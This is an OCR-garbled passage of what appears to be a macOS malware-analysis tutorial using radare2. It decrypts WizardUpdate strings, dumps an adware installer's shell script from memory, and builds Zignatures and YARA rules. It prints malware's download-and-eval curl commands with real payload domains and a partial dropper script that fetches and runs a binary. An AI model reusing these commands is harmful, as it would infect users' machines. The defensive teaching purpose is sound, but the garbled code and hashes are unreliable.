1I??Xn?Eirc? *?nN???p?T?8G??p??~?2m$ ' oye? Kat? ?Xn?a(3c?? 


?j w<o/?qi 


?H 
232/2#K22K/2p?2?2e1iI3227}72Y?22qQv? 
?H 
232/2#K 
-/sto(??Xod o'U??9 ???0? 
Our decoder returns ??uE_?\&?2x?1* 7S? 


gibberish after we try to 
decode the base64 


Finding cstrings in 
the TEXT section 
with r2’s ~ filter 


Decoding the 
WizardUpdate’s 
encrypted strings 
back to plain text 


Hmm. The script runs without error, but the final decoded base64 output is gibberish. That suggests 
that while our key and ciphers are correct, our alphabet might not be. Returning to r2, let’s search 
more widely across the strings with iz~string. 


JUOQVNIH5 Lx 


Fghi jklmnopqrstuvwxy2@123456789+/ 
'n* exe moximun supported size 


The first hit actually looks similar to the one we tried, but with fewer characters and a different order, 
which will also affect the result in a Vigenére table. Let’s try again using this as the hardcoded alphabet. 


afns~:1..5[2] | grep -v MAID | sed 's/str.//g' 
Nua3ZspaoveZ0wL bFnmdj6CkEs9fq90T10HqsEi Jw8a@LESP98guZ2m9f Imnt 1 FZutWX99cZZqRMcjh1j8PR 
L8GuYtgNcOKI1a6gGKmKONGOL IDHEokMAQzhFzAunJ YvxX00_CogKZa7gtCARA4QBFG9qi 9BN1buVGKmKONGOLIDHEOkM 
Sd a a ee 
afns~:1..5[2] | grep -v MAID | sed 's/str.//g' > ciphers 


cat ciphers | while read line; do ./vigenere.py LBZEWWERBC $line | base64 -D; echo; done 
system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }' 
https://api. subvideotube. com/v2/u0i 7machine_id={MAID}&pr=subvideotube 
CMD=$(Ccurl connect-timeout 900 -L "{APT_URL}");eval "$CMD" 


Success! The first cipher turns out to be an encoding of the system_profiler command that 
returns the device’s serial number, while the second contains the attacker’s payload URL. The third 
downloads the payload and executes it on the victim’s device. 


Reading Encrypted Strings In-Memory 


Reverse engineering is a multi-faceted puzzle, and often the pieces drop into place in no particular 
order. When our triage of a malware sample suggests a known or readily identifiable encryption 
scheme has been used as we saw with macOS.ZuRu and WizardUpdate, decrypting those strings 
statically can be the first domino that makes the other pieces fall into place. 


However, when faced with an incalcitrant sample on which the authors have clearly spent a great deal 
of time second-guessing possible reversing moves, a ‘cheaper’ option is to detonate the malware and 
observe the strings as they are decrypted in memory. Of course, to do that, you might need to defeat 
some anti-analysis and anti-debugging tricks first, as we discussed in the previous chapter. 


In our third case study, then, we’re going to take a look at a common adware installer. Adware is big 
business, employs lots of professional coders, and produces code that is every bit as crafty as any 
sophisticated malware you’re likely to come across. If you spend anytime dealing with infected Macs, 
coming across adware is inevitable, so knowing how to deal with it is essential. 


md5 cfcba69503d5b5420b73e69acfec56b7 
shal = e9'78fbcb9002b7dace469f00da485a8885946371 
sha256 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537 


> | 4309 157a4ad42dal69ZcM5b57 1S781cde775c7d If7C7d56e606C13da5b35537 


29 () 29 security vendors and 1 sandbox flagged this file as malicious 


43b9157a4ad42da1692c 


Malware_InstallerkC 


Decoding the ———_— 64bits macho 
WizardUpdate’s , 
encrypted strings 
back to plain text 


Let’s dump this into r2 and see what a quick triage can tell us. 


r2 -AA 43b9157a4ad42dal692cfbSbS71598Fcde77Sc7d1f9c7dS6e6d6c13da5035537 
Analyze all flags starting with sym. and entry® (aa) 
Analyze function calls (aac) 
Analyze len bytes of instructions for references (aar) 
Check for objc references (aao) 
Finding and parsing C++ vtables (avrr) 
Type matching analysis for all functions (aaft) 
Propagate noreturn information (aanr) 
Finding function preludes 
Enable constraint types analysis for variables 
- Can you you challenge a perfect immortal machine? 
eco monokat 
afll 
address size nbbs edges ce cost min bound range max bound calls locals args xref frame name 


pds @nain 
- section.@,_ TEXT.__text 
io- entry@ 
te+ func. 166066738 
- rip 


2 named @ 


This sample is 
keeping its secrets 


Well, not much! If we print the disassembly for the main function with pdf @main, we see a mass of 
obfuscated code. 


[6x 1060636e9: 16) =-1 
\x8b \D\xO6+4\xel@\x1 


\ l¢ 
xorps xnm@, xmaword [section.3 


5 
}O( \xBlmuU. PQ 


100003619:1 


108003619: 16 
106083769 


Lots of obfuscated code 
in this adware installer 


However, the only calls here are to and , as we saw from the function list. 


Let’s quit and reopen in r2’s debugger mode (remember: you may need to the sample and 
remove any code signature and extended attributes as explained in chapter 2). 


Let’s find the entrypoint with the ie command. We'll set a breakpoint on that and then execute 
to that point. 


Desktop sudo r2 -AA -d 43b9157a4ad42da1692cfb5b571598fcde775c7d1f9c7d56e6d6c13da5b35537 
Analyze all flags starting with sym. and entry®@ (aa) 
Analyze function calls (aac) 
Analyze len bytes of instructions for references (aar) 
Check for objc references (aao) 
Finding and parsing C++ vtables (avrr) 
Skipping type matching analysis in debugger mode (aaft) 
Propagate noreturn information (aanr) 
Invalid address from 6x108361f38 
Invalid address from 6x108361f5S3 
Invalid address from 6x108388155 
Finding function preludes 
Enable constraint types analysis for variables 
-- EIP = 6x41414141 
je 
{Entrypoints] 
vaddr=0x1057c67a8 paddr=8x600687a8 haddr=6x68008S08 type=program 


1 entrypoints 


db 0x1057c07a0 
dc 


EXC_SOFTWARE 


Breaking on 
the entrypoint 


Now that we’re at , let’s break on the call and take a look at the registers. To do that, 
first get the address of the system flag with 


Then set the breakpoint on the address returned with the command. We can continue 
execution with 


[0x1057c07a1]> (EBSVSEEH 
@x1057c2846 6 sym.imp.system 
@x1057c3018 8 reloc.system 


. 7 [( alj}> dc 
Setting a breakpoint xnu_continue: Warning: Failed to resume task 


on the system call and hit breakpoint at: 0x1057c07a0 
continuing execution 


Note that in the image above, our first attempt to continue execution results in a warning message 
and we actually hit our main breakpoint again. If this happens, repeating the dc command should get 
you past the warning. Now we can look at all the registers with 


ab 
@x1@57c07a@ - @x1@57cO7al 1 --x sw break enabled valid cnd="* co name="9x1057c87a8" module="/Users/maclab/Desktop/4309157a4ad42dal692cfbSbS71 
598 fcde77Sc7d1f9c7d56e6d6C13daSb35537" 
@x1057¢2846 ~ 6x1057c2847 1 ~--x sw break enabled valid cnd="" mame="6x1057¢2846" modul /Users/maclab/Desktop/ ./43b91S7adad42dal692cfbSbs 
71598fcde775c7d1 #9c7d56e6d6c13da5b35537" 

ac 
hit breakpoint at: @x1@S7c2846 

Grr 
role reg value rets 
SN 4001760888 rax 

188 rbx 

Adore 1643123687 rex 
A2 Itfeea la_copy_userrwx rdx RW Ox9a0G007ffecad3te 
Aa 86992166 4309157a4ad42da1692cfOS0571598fcae77Sc7G1t9c7cS6e6d6c13da5035537 7 DATA Gata section.7 DATA Cata,rdai & 
W @x726964547) 


Al la_copy_userrwx r Ttteeas3ttr 
BP ? la_copy_userrwx rbp R W Bx7ffeea3td4e 
sP ffee 8 la_copy_userrwx rsp R W Ox1057cObdd 
At 8 
AS 8 

8 


8 
239 r12 
88 r13 asct 
177 114 
40 riS ascii (‘(") 
4386990150 43b91S7a4ad42da1692cfbSbS715 Ge77Sc7dlf9c7cS6e6d6c13daSb3S537 1. TEXT. stubs system,rip syn.imp.system R 
jmp qword [rip + @x7cc]* °43b9157a4ad42da1692cfbSbS71598fcde77ScTdl (9c 7d56e6dGc 13da5b35537 
rflags 246 582 rflags 
cs 246 582 rflags 
ts 2b 43 ascii (‘*") 
as 8 9 


Revealing the encoded 
strings in memory 


Atthe register, we can see the beginning of the decrypted string. Let’s see the rest of it. 


psa 2048 @rdi 
TORRIGIFM( if ( <n “S{TMPDIR}” }; then BEGINS (THPDIR)”;else Q@REOMPUDARWIN_USER_TEMP_DIR;T1;);where_from_url(){ /usr/bin/sqlite3 “${HOME)/Library 
/Preferences/com.apple.LaunchServices.QuarantineEventsV2" “SELECT LSQuarantineDataURLString FROM LSQuarantineEvent ORDER BY LSQuarantineTimeStanp 
DESC LIMIT 1° 2>/dev/null;}:extract_did(){ local -r url="$(where_from_url)"; local query="${url#*\\?}"; local did_find=@;for param in ${query//[=k)/ 
}ido((did_find == 1))&&echo "${param} *&&dreak;[ "${param} m_source” ]||[ "S{param}" == “sidw” }|/{ *S{paran}" “neo” )&&did_find=1;done; 
}iclose terminal (){ kil@UQUWerminal” :):GOWNNORME)( local -r url="${2}";local -r tmp _dir="${2}"; local -r path="${tmp_dir}/S(uuidgen) ~ 

" *S${url}";then echo “${patn}";:ti;};unarchive(){ local -r tgz_path=*${1)}":;[ -z "S{tgz_path)" ]&&return;ltocal -r app_dire= 
ktemp -d "$(dirname "${tgz_path}")/S(uuidgen)");if tar -xzf "${t hen echo "S{app_dir}":fi;rm -rf "${tgz_patn} 


nQ){ local -r app_dir="${1}";[ -z “S{app_dir}* J&&return;loc - w z r)°/?*. app); local 
* J&kecho “${app_path}";};bin_path(){ local -r a t a )&&return; local 
):local -r binary_path="${binary_paths[8}}":echo "${binary_path} 
${3)";[ -z "S{bin_path}" J&&return; "${bin_path}" -did "S{dic}*;};main(){ local 
“${C1d)" J&&return; local -r tmp_dir= 
r app_dir="$(unarchive “${arch_path}")*:local -r app_path= 
_path}* “S{did}* “S{app_path}";rn -rf *${tmp_dir}";}smain 


The clear text is revealed 
in the rdi register 


Ah, an encoded shell script, typical of Bundlore and Shlayer malware. One of my favorite things about 
r2 is how you can do a lot of otherwise complex things very easily thanks to the shell integration. Want 
to pretty-print that script? Just pipe the same command through from right within r2. 


We can easily format 
the output by piping it 
through the sed utility 


psa 2048 @rdi | sed s'/;/\n/g* 
temp_dir(){ if [ -m "S{TMPDIR}" ] 


then "${TMPDIR)" 
else 


1 
} 
where_from_url(){ JUSF/BIR/SQITteS *$ (Home }/UTbrary erences/co pple.L 
M LSQuarantineEvent ORDER BY LSQuarantineTimeStamp DESC LIMIT 1" 2>/dev/null 


" "SELECT LSQuarantineDataURLSt 


} 

extract_did(){ local -r url="$(wnere_from_url)* 

local query="${url#*\\?}" 

local did_find=@ 

for param in S{query//[=&)/ } 

do((did_find == 1))&kecho "${param}"&&break 

{ "S{param)" == “utm_source” J|[{ “S{param}" == “sidw” J/|[ “S{param}” == “neo” J&&d1c_find=1 
done 


} 

Gownload(){ local -r url=*${1}" 

local -r tmp_dir="${2}" 

local -r path="${tmp dir}/$(uuidgen)”* 
if * "S${url}" 
then echo "${path}" 

t 


unarchive(){ local -r tgz_path="${1}" 

( -z "S{tgz_path)" )&&return 

local -r app_dir=$ (/USP/BIR/MRECRPISOINS (dirname "${tgz_path}")/$(uuidgen)") 
if tar -xzf “${tgz_path}" -C “S${app_dir}” 

then echo "${app_dir}” 

fi 

rm -rf “${tgz_path}” 


} 

app_patn(){ local -r app_dir="${1}" 

{ -z "S{app_dir}" ]&&return 

local -r app_paths=("S{app_dir}"/?*. app 
local -r app_pa ${app_paths (6) }" 

[ -d "S${app_path)” ]&&echo “${app_path}* 


} 

bin_path(){ local -r app_path="${1}" 

{ -z "S${app_path}" ]&&return 

local -r binary_paths=("${app_path}/Contents/MacOS"/?*) 
local -r binary_path="${binary_paths[®]}" 

echo "S{binary_path}" 


} 

exec_bin(){ local -r bin_path="${1}" 
local -r did="${2}" 

local -r app_path="${3}" 

{ -z "${bin_path}" )&&return 
"${bin_path})” -did "${did}" 

} 


main(){ local -r url="${1}" 
close_terminal 


local -r did="$(extract_did)" 

{ -z "${did}" )&&return 

local -r tmp_dir="$(/usr/bin/mktemp -d 
local - 

local - arch_pat 
local - I ${app_dir) 
local -r bi 

exec_bin 


} 


More Examples of macOS 
String Decryption Techniques 


WizardUpdate and macOS.ZuRu provided us with some real-world malware samples where we 
could use the same general technique: identify the encryption algorithm in the functions table, 
search for and isolate the key and ciphers in the strings, and then find or implement an appropriate 
decoding algorithm. 


Some malware authors, however, will implement custom encryption and decryption schemes and 
you'll have to look more closely at the code to see how the decryption routine works. Alternatively, 
where necessary, we can detonate the code, jump over any anti-analysis techniques and read the 
decrypted strings directly from memory. 


If all this has piqued your interest in string encryption techniques used in macOS malware, then you 
might like to check out some or all of the following for further study. 


Q7 


EvilQuest, which we looked at in the previous chapter, is one example of malware that uses a custom 
encryption and decryption algorithm. SentinelLabs broke the encryption statically, and then created 
a tool based on the malware’s own decryption algorithm to decrypt any files locked by the malware. 
Fellow macOS researcher Scott Knight also published his Python decryption routine for EvilQuest, 
which is worth close study. Adload is another malware that uses a custom encryption scheme, and 
for which researchers at Confiant also published decryption code. 


Notorious adware dropper platforms Bundlore and Shlayer use a complex and varying set of shell 
obfuscation techniques which are simple enough to decode but interesting in their own right. 


Likewise, XCodeSpy uses a simple but quite effective shell obfuscation trick to hide its strings from 
simple search tools and regex pattern matches. 


Summary 


In this chapter, we’ve looked at a variety of different encryption techniques used by macOS malware 
and how we can tackle these challenges both statically and dynamically. In the next chapter, we shall 
turn our attention to malware profiling and signature writing. 


macOS Malware Hunting 
with radare2 | Leveraging XREFS, 
YARA and Zignatures 


In this chapter, we tackle several related challenges that every malware hunter faces: you have a 
sample, you know it’s malicious, but 


* How do you determine if it’s a variant of other known malware? 
¢ If it is unknown, how do you hunt for other samples like it? 


¢ Howdo you write robust detection rules that survive malware 
author’s refactoring and recompilation? 


The answer to those challenges is part art and part science: a mixture of practice, intuition and 
occasionally luck(!) blended with a solid understanding of the tools at your disposal. 


As always, you’re going to need a few things to follow along, with the second and third items in this 
list installed in the first. 


1. Anisolated VM - see instructions in Chapter 1 for how to get set up 
2. Some samples —see Samples Used below 


3. Latest version of r2 — see the github repo here. 


Loading the sample into 
r2, analyzing its functions, 
and displaying its hashes 


What are Zignatures and Why Are They Useful? 


Zignatures are r2’s own format for creating and matching function signatures. We can use them 
to see if a sample contains a function or functions that are similar to other functions we found in 
other malware. 


Similarly, Zignatures can help analysts identify commonly re-used library code, encryption algorithms 
and deobfuscation routines, saving us lots of reversing time down the road (for readers familiar with 
IDA Pro or Ghidra, think F.L.I.R.T or Function ID). 


What’s particularly nice about Zignatures is that you can not only search for exact matches but also 
for matches with a certain similarity score. This allows us to find functions that have been modified 
from one instantiation to the other but which are otherwise the same. 


Zignatures can help us to answer the question of whether an unknown sample is a variant of a known 
one. Once you are familiar with Zignatures, they can also help you write good detection rules, since 
they will allow you to see what is constant in a family of malware and what is variant. Combined 
with YARA rules, which we'll take a look at later, you can create effective hunting rules for malware 
repositories like VirusTotal to find variants or use them to help inform the detection logic in malware 
hunting software. 


How to Create and Use A Zignature 


Let’s jump into some malware and create our first Zignature. Here’s a more recent sample of 
WizardUpdate than the one we looked at earlier. 


md5 a21eac8e21dab9c82da03d86b50b1793 
shal 2f70787faafef2efb3cafcalc309c02c02a5969b 
sha256 0c08992841d5a97e617e7 2ade0c992f8e8f0abc9265bdcabe09e4a3cb7cb4754 


auser@reversing-lab-1@ Wiz % r2 -AA OSX_WizardUpdate_Bi 
[x] Analyze all flags starting with sym. and entry@ (aa) 
[x] Analyze function calls (aac) 

[x] Analyze len bytes of instructions for references (Caar) 
[x] Check for objc references (aao) 

[x] Finding and parsing C++ vtables (Cavrr) 

[x] Type matching analysis for all functions (aaft) 

[x] Propagate noreturn information Caanr) 


[x] Finding function preludes 
[x] Enable constraint types analysis for variables 
-- Hold on, this should never happen! 


1x100003e: it 

mdS a2ileac8e21dab9c82da03d86b50b1793 

shal 2£70787faafef2efb3cafca1c309c02c02a5969b 

sha256 0c08992841d5a97e617e72ade0c992f8e8 FOabc9Z265bdcabe09e4a3cb7cb4754 
[0x100@ 80]> 


We’ve loaded the sample into r2 and run some analysis on it. We’ve been conveniently dropped at the 
function, which looks like this. 


48: int main Cint arge, char **argy, char **envp); 
var int64_t 
var int6s_t 


rbp 
mov rbp, rsp 
sub rsp, Oxi@ 


nov drord [ 


48803034 lea rdi, str.UU 
__curl___connect_timeout_980, 
5 “UUTD-\"$C 
TOPlat formUID\"}/Following-sibling: :*[1)/text()' -)\";INSTOE«$Ccurl --connect-timeout 980 
al \"$INSIOE\"" ; const chor *string 
ss ; int system{const chor *string) 
xOr @Cx, ecx 
nov drord [ 
mov eax, ecx 
add rsp, Oxi? 
rbp 


WizardUpdate 
function 


That function contains some malware specific strings, so should make a nice target for a 
Zignature. To do so, we use the command, supplying the parameters of the function name and 
the signature name. Our sample file happened to be called “WizardUpdateB1”, so we’ll call this 
signature “WizardUpdateB1_main”. In r2, the full command we need, then, is: 


We can look at the newly-created Zignature in JSON format with 


zaf main wizardUpdateB1_main 


“wizardUpdateBl main”, 
55488905488 3eC10c745 f cOOBODONE488d3d3400000GE80d00000031098945 F889c84883C4105dc3", 
FFFFFFFFFFFFFFFFFFF EFF FF FFE fF FORROORODR000 fF FOQBOBOROFFFFFFFFFFFFFFFFFFFFFFFFFE, 


"int main Cint argc, char **argv, char **envp)", 


iC 
m. imp. system" 


"xrefs": [ 


J 


"collisions": [ 


: "9395a37bd6Safc9d19d7a2c2ec6Sle2ceB3df7Ge35761be8S51dSbd90f c3589eF" 


An r2 Zignature viewed 
in JSON format 


zb returns how close 

the match was to the 
Zignature and the function 
at the current address 


Create function signatures 
for every function ina 
binary with one command 


To see that the Zignature works, try zb and note the output: 


(@x100003e80]> zb 
1.00000 1.00000 B 1.00000 G wizardUpdateB1_main 


The first entry in the row is the most important, as that gives us the overall (i.e., average) match 
(between 0.00000 and 1.00000). The next two show us the match for bytes and graph, respectively. 
In this case, it’s a perfect match to the function, which is of course what we would expect as this is the 
sample from which we created the rule. 


You can also create Zignatures for every function in the binary in one go with zg. 


generated zignatures: 2 

[9x100003e80]> zqq 

@x100@003eq8 sym.imp.system: b(1/6) g(cc=1,nb=1, e=@, eb=1,h=6) 
; int system Cconst char *string) 

h(9c824aae) 

@x100003e8@ main: b(30/40) g(cc=1,nb=1,e=0,eb=1,h=40) 
; sym.imp.system 


; int main Cint argc, char **argv, char **envp) 
refs[1] vars[2] h(@27a70ff) 


Beware of using zg on large files with thousands of functions though, as you might get a lot of errors 
or junk output. For small-ish binaries with up to a couple of hundred functions it’s probably fine, 
but for anything larger than that I typically go for a targeted approach. 


So far, we have created and tested a Zignature, but its real value lies in when we use the Zignature on 
other samples. 


Create a Reusable and Extensible Zignatures File 


At the moment, your Zignatures aren’t much use because we haven’t learned yet how to save and 
load Zignatures between samples. We'll do that now. 


We can save our generated Zignatures with zos <filename>. Note that if you just provide the bare 
filename it’ll save in the current working directory. If you give an absolute path to an existing file, r2 
will nicely merge the Zignatures you’re saving with any existing ones in that file. 


Radare2 does have a default address from which it is supposed to autoload Zignatures if the 
autoload variable is set, namely ~/ . local/share/radare2/zigns/ (in some documentation, it’s 
~/.config/radare2/zigns/) However, I’ve never quite been able to get autoload to work from 
either address, but if you want to try it, create the above location and in your radare2 config file 
(~/.radare2rc) add the following line. 


Sample WizardUpdate_ 
B2’s main function doesn’t 
match our Zignature 


Sample WizardUpdate_ 
B5’s main function is 

a perfect match for 

our Zignature 


The output from zb 
shows that the current 
function doesn’t match 
any of our previous 
function signatures 


e zign.autoload = true 


In my case, I load my zigs file manually, which is asimple command: zo <filename> to load, and zb 
to run the Zignatures contained in the file against the function at the current address. 


ad 


[@x1@@000dfO]> it 
md5 le aaah ane 


sha256 1 RecEeNauaayeieeiac atacdeecasetrentsiuadifecciesectsacsiaaiees 


[@x10@000df@]> zo zigs 

[@x100000df0]> zb 

@.46618 @.10882 B @.82353 G wizardUpdateB1_main 
[0x100000dfO]> 


[@x100003e70]> it 
mdS pee dd44c3 


sha256 ROPES ES d892caac2c d7c3d2abb8e5c93d74¢344fc5879¢ 


[@x100003e70]> zo zigs 

[@x100003e70]> zb 

1.00000 1.00000 B 1.00000 G wizardUpdateBi_main 
[@x100003e70]> 


As you can see, the sample above B5 is a perfect match to B1, whereas B2 is way off with the match 
only around 46.6%. 


When you’ve built up a collection of Zignatures, they can be really useful for checking a new sample 
against known families. I encourage you to create Zignatures for all your samples as they will pay 
dividends down the line. Don’t forget to back them up, too. I learned the hard way that not having a 
master copy of my Zigs outside of my VMs can cause a few tears! 


Creating YARA Rules Within radare2 


Zignatures will help you in your efforts to determine if some new malware belongs to a family you’ve 
come across before, but that’s only half the battle when we come across a new sample. We also 
want to hunt — and detect — files that are like it. For that, YARA is our friend, and r2 handily integrates 
the creation of YARA strings to make this easy. In this next example, we can see that a different 
WizardUpdate sample doesn’t match our earlier Zignature. 


[@x100000dc@)> zo /Users/auser/.local/share/radare2/zigns/zigs | 
[0x100000dc@]> zb 

@.46618 0.10882 B 0.82353 G main 

@.46618 6.10882 B 0.82353 G wizardUpdateBi_main 

6.40912 6.01471 B 8.80353 G  sym.imp.system 

[0x10@00@dcO)> afll 

address size nbbs edges cc cost min bound range max bound calls locals args xref frame name a 


sha2S5" S10SS5e67b1d421dS1a8 feieaibas70sRazbacibb16c7e4dh36RubOfdadch11 
[@x100000dc@)> 


While we certainly want to add a function signature for this sample’s main() to our existing Zigs, we 
also want to hunt for this on external repos like VirusTotal and elsewhere where YARA can be used. 


Our main friend here is the pcy command. Since we’ve already been dropped at main( )’s address, 
we can just run the pcy command directly to create a YARA string for the function. 


[@x10000@dc@]> iM 
[Main] 
O8088dc@ paddr=0x100800dcO 
dc@]> pey 
Shex_100000dc®@ « { 55 48 89 eS 48 83 ec 68 c7 45 fe 08 08 
2a @1 @8 @@ 48 8d 3d a9 O2 C8 OB 89 45 F4 eB 1b B1 BO BO 4, 
+) 


@8 @8 48 8d 3d 68 G1 OO BO e8 39 G1 OB OB 48 8d 3d aa G2 OO BO 89 45 FB eB 
8 Bd 3d cf OS OB OB 89 45 FO e8 Bc O1 OO OB 48 Bd 3d 3b O6 BA BO 89 45 ec e 
8 fd 08 08 OB 48 8d 3d 59 O9 BG OG 89 45 e8 e8 ce OB OB 48 8d 3d 82 09 08 08 89 45 e4 e8 df 88 BB BO 48 Bd 3d ac Oc OB OB 89 45 &B 
e8 d@ 00 00 00 48 8d 3d c3 Gc OO GO 89 45 dc e8 cl O@ 08 OO 48 Bd 3d fb OF OO OO 89 45 dB eB b2 OO OO OO 48 Bd 3d 10 10 00 OG 89 45 
d4 eB a3 08 G0 00 48 Bd 3d 4a 13 08 08 89 45 d® e8 94 BG OO OG 48 Bd 3d 67 13 G8 G@ 89 45 cc e8 85 OO OO OO 48 Bd 3d 7F 16 O@ OO 89 4 
5 c8 e8 76 08 8 O28 48 8d 3d a4 16 O@ OO 89 45 c4 eB 67 G8 G0 OO 48 Bd 3d c3 19 OO OB 89 45 cB e8 58 OO OO OG 48 Bd 3d db } 

a I> 


Generating a YARA string e 


for the current function 


However, this is far too specific to be useful. Fortunately, the pcy command can be tailored to give us 
however many bytes we wish at whatever address. 


We know that WizardUpdate makes plenty of use of ioreg, so let’s start by searching for instances 
of that in the binary. 


[@x100000dc0]> 7 ioreg 

Searching 5 bytes in [0x100005000-0x100006000] 

hits: @ 

Searching 5 bytes in [@x100004000-0x100005000] 

hits: @ 

Searching 5 bytes in [0x100003000-0x100004000] 

hits: @ 

Searching 5 bytes in [0x100000000-0x100003000] 

hits: 19 

Searching 5 bytes in [@x100000-0x1f0000] 

hits: @ 

@x100000F83 hit3_@ .machine_id": "$Cioreg IOPLatf. 

@x100001132 hit3_1 .machine_id": "$Cioreg IOP lLatf. 

@x1000012c2 hit3_2 .machine_id": "$Cioreg IOPLatf. 

@x1000014de hit3_3 .machine_id": "$Cioreg IOP lLatf. 

Qx10000166a hit3_4 .machine_id": "$Cioreg I0PLatf. 

Q@x100001847 hit3_S5 .machine_id": "$Cioreg I0Platf. 

Q@x1000019db hit3_6 .machine_id": "$Cioreg I0Platf. 

Qx100001baf hit3_7 .machine_id": "$Cioreg I0PLatf. 

@x100001d48 hit3_8 .machine_id": "$Cioreg I0PLatf. 

@x100001f1b hit3_9 .machine_id": "$Cioreg I0Platf. 

@x1000020b5 hit3_10 .machine_id": "S$Cioreg I0PlLatf. 

@x10000227f hit3_11 .machine_id": "$Cioreg I0PlLatf. 

@x100002408 hit3_12 .machine_id": "$Cioreg I0PlLatf. 

@x100002S5e1 hit3_13 .machine_id": "$Cioreg I0PlLatf. 

@x10000276a hit3_14 .machine_id": "$Cioreg I0PLatf. 

@x100002946 hit3_15 .machine_id": "$Cioreg IOPlatf. 

@x1@@@@2aeb hit3_16 .machine_id": "$Cioreg I0Platf. 
Searching for the @x1@@@@2cc6 hit3_17 .machine_id": "$Cioreg IOP lLatf. 

. s . @x100@@2e6c hit3_18 .machine_id": "“$Cioreg IOP lLatf. 

string ioreg ina 


WizardUpdate sample 


Lots of hits. Let’s take a closer look at the hex of the first one. 


> | content:{ 68 74 74 73 3a 2f 2f 65 76 65 6e 74 73 2e 6d 61 63 6f 70 74 69 6d 69 7a 65 2e 63 Of 6d 2 70 } 


FILES 1 


Our string only found a 
single hit on VirusTotal 


But note how we can iterate on this process, easily generating YARA strings that we can use both for 
inclusion and exclusion in our YARA rules. 


CDEF 
iblin 


application. 
; char ol 
X POST -d ' 
NTENT' http 
5.macoptim 
f 7070 : c2 e.com/ppe" ; eval 


5354 00 3b64 6972 202d S$REQUEST.kdir 
/str.if_ then_CONTENT__eve. . 
P C 


[e C pcy 32 
| toxroooeerss}> = { 66 6f 6c 6c 6f 77 69 Ge 67 2d 73 69 62 6c 69 Ge 67 3a 3a 2a Sb 31 Sd 2f 74 65 78 74 28 29 27 20 } 
(@x1 3 


2a Sb 315d 2f 7465787 


This time we had 
better success with 
46 hits for one string 


This string gives us lots of hits, so let’s create a file and add the string. 


pcy 32 >> WizardUpdate_B.yara 


Outputting the 
YARA string to a file 


13]> pey 32 
$hex_100000fd3 = { 66 6f 6c Gc GF 77 69 Ge G7 2d 73 69 62 Gc 69 Ge 67 3a 3a 2a Sb 31 Sd 2f 74 65 78 74 28 29 27 20 } 


]> pcy 32 >> WizardUpate_B.yara 


From here on in, we can continue to append further strings that we might want to include or exclude 
in our final YARA rule. When we are finished, all we have to do is open our new .yara_ file and add 
the YARA meta data and conditional logic, or we can paste the contents of our file into VTs Livehunt 
template and test out our rule there. 


XREFS For the Win 


At the beginning of this chapter I said that the answer to some of the challenges we would deal with 
here were “part art and part science”. We’ve done plenty of “the science”, so let’s round out the 
chapter by talking a little about “the art”. 


Let’s return to a topic we covered briefly in Chapter 2 — finding cross-references in r2 — and introduce 
a couple of handy tips that can make development of hunting rules a little easier. 


When developing a hunting or detection rule for a malware family, we are trying to balance two 
opposing demands: we want our rule to be specific enough not to create false positives, but wide or 
general enough not to miss true positives. If we had perfect knowledge of all samples that ever had 
been or ever would be created for the family under consideration, that would be no problem at all, but 
that’s precisely the knowledge-gap that our rule is aiming to fill. 


A common tip for writing YARA rules is to use something like a combination of strings, method 
names and imports to try to achieve this balance. That’s good advice, but sometimes malware 
is packed to have virtually none of these, or not enough to make them easily distinguishable. 
On top of that, malware authors can and do easily refactor such artifacts and that can make your rules 
date very quickly. 


A supplementary approach that I often use is to focus on code logic that is less easy for author’s to 
change and more likely to be re-used. 


Let’s take a look at this sample of Adload written in Go. 


md5 015632f990eb3d5b754b5e0471f498c5 
shal 279d5563f278f5aea54e84aa50ca3 55f54aac743 
sha256 c9912d3631ed58b96c000f51345bf58cf51f9d6e33dea3dc8be264ef033f3d95 


It’s a variant of a much more prolific version, also written in Google’s Golang. Both versions contain 
calls to a legit project found on Github, but this variant is missing one of the distinctive strings that 
made its more widespread cousin fairly easy to hunt. 


A version of Adload that 
calls out to a popular 
project on Github 


Your rules won’t catch 
much if your strings 
are too specific 


Let’s grab some bytes 
immediately after the 
C2 string is loaded 


[@x@10d4320]> s @x@1247160 

[@x@1247160]> pds 

@x@12471a5 call sym.github.com_denisbrodbeck_machineid.ID 

@x@1247ibf "_“hms|} + / @ P [ \t&v) JONn*., ->-c..//0@O@XO@b000S0x255380: ; =#> 

@x@12471d4 call sym.runtime.convTstring 

@x@12471f1 int64_t arg_7@h 

@x@1247200 "809://::1??72ACKAprAugDSADecEOFFebFriGETGetHanJanJulJunLaoMarMay" 

@x@1247226 int64_t arg_68h 

@x@1247226 sym.main.DownloadURL] "“http://api.assistrotator.com/ga?7a=%s&b=%sidna 
id span statemheap.freeSpanLocked - invalid stack freenet/url: invalid control 
blocked read on closing polldescruntime: typeBitsBulkBarrier without typesetCh 
t arg_68h ; "“http://api.assistrotator.com/ga?a=%s&b=%sidna: internal error i" 
@x@1247255 call sym. fmt.Sprintf 

@x@124725f int64_t arg_78h 

@x@1247265 int64_t arg_7Oh 

@x@1247265 sym.net_http.DefaultClient] "*\xbe0\x@1" 

@x@124727a call sym.net_http._Client_.Get 

@x@12472cb call sym.runtime.deferprocStack 


However, notice the URL at 0x7226. That could be interesting, but if we hit on that domain name 
string alone in VirusTotal we only see three hits, so that’s way too tight for our rule. 


content:"apl.assistrotator.com" 


FILES 3 


macho 


@x01247255 call sym. fmt . Sprintf 


sym.net_http.DefaultClient] "*\xbeO\x@1" 
call sym.net_http._Client_.Get 


2472cb call sym. runtime.deferprocStack 
[@x@1247160]> s @x@1247255 
[0x@1247255]> pcy 96 
$hex_1247255 = { 68 e6 c3 e6 ff 48 8b 44 24 28 48 8b 4c 24 30 90 48 Bb 15 fc 97 2a O@ 48 89 14 24 48 89 44 24 O8 48 89 4c 
20 48 85 d2 Of 85 74 O2 @@ OO 48 89 84 24 ad 8 OO OO 48 Bb 48 40 84 O1 48 Bb SQ 48 c7 44 24 58 18 OO B® OO 48 83 cl 18 } 


We might do better if we try grabbing bytes of code right after that string has been loaded, for while 
the API string will certainly change, the code that consumes it perhaps might not. 


In this case, searching on 96 bytes from 0x7255 catches a more respectable 23 hits, but that still 
seems too low for a malware variant that has been circulating for many months. 


content:{ e8 e6 c3 ed ff 48 8b 44 24 28 48 8b 4c 24 30 90 48 Bb 15 fc 97 2a 00 48 89 14 24 48 89 44 24 08 48 89 4c 24 10 8 71ac fb ff 4 


Notice the dates - this 
malware has probably far 
more than just 23 samples 


Let’s see if we can do better. One trick I find useful with r2 is to hunt down all the XREFs to a particular 
